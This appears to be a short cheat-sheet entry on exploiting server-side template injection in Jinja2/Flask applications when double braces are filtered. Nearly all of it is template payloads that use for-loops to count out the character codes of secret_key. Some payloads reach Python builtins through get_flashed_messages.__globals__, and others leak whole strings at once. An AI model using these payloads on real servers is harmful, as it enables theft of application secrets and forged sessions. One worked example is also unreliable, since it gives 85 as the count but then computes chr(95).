Only useful when:
-
SSTI possible
-
Double brackets
{{filtered -
Alternate data extraction methods not possible (reverse shell etc.)
Rather than using boolean logic to extract data a bit at a time we can extract entire integers by making use of for statements.
{% for i in range(value) %}1{% endfor %}
# Output: 11111111...value can now be calculated by counting the number of 1's
Can be useful for extracting parts of strings
{% for i in range(ord(secret_key[3])) %}1{% endfor %} # secret_key = "v3rY_s3Cr3t"
# Output: 111111... 89 total
c_3 = chr(value) # = chr(89) = 'Y'If ord or other python builtins aren't available we can use private properties of a known object to find them
{% for i in range(get_flashed_messages.__globals__.__builtins__.ord(secret_key[4])) %}1{% endfor %}
# Output: 111111... 85 total
c_4 = chr(value) # = chr(95) = '_'Can be combined to extract multiple integers at once, or whole strings
{% for i in range(get_flashed_messages.__globals__.__builtins__.ord(secret_key[0])) %}0{% endfor %}
{% for i in range(get_flashed_messages.__globals__.__builtins__.ord(secret_key[1])) %}1{% endfor %}
{% for i in range(get_flashed_messages.__globals__.__builtins__.ord(secret_key[2])) %}2{% endfor %}
# Output: 000...111...222...
secret_key = chr(value_0) + chr(value_1) + chr(value_2) + ...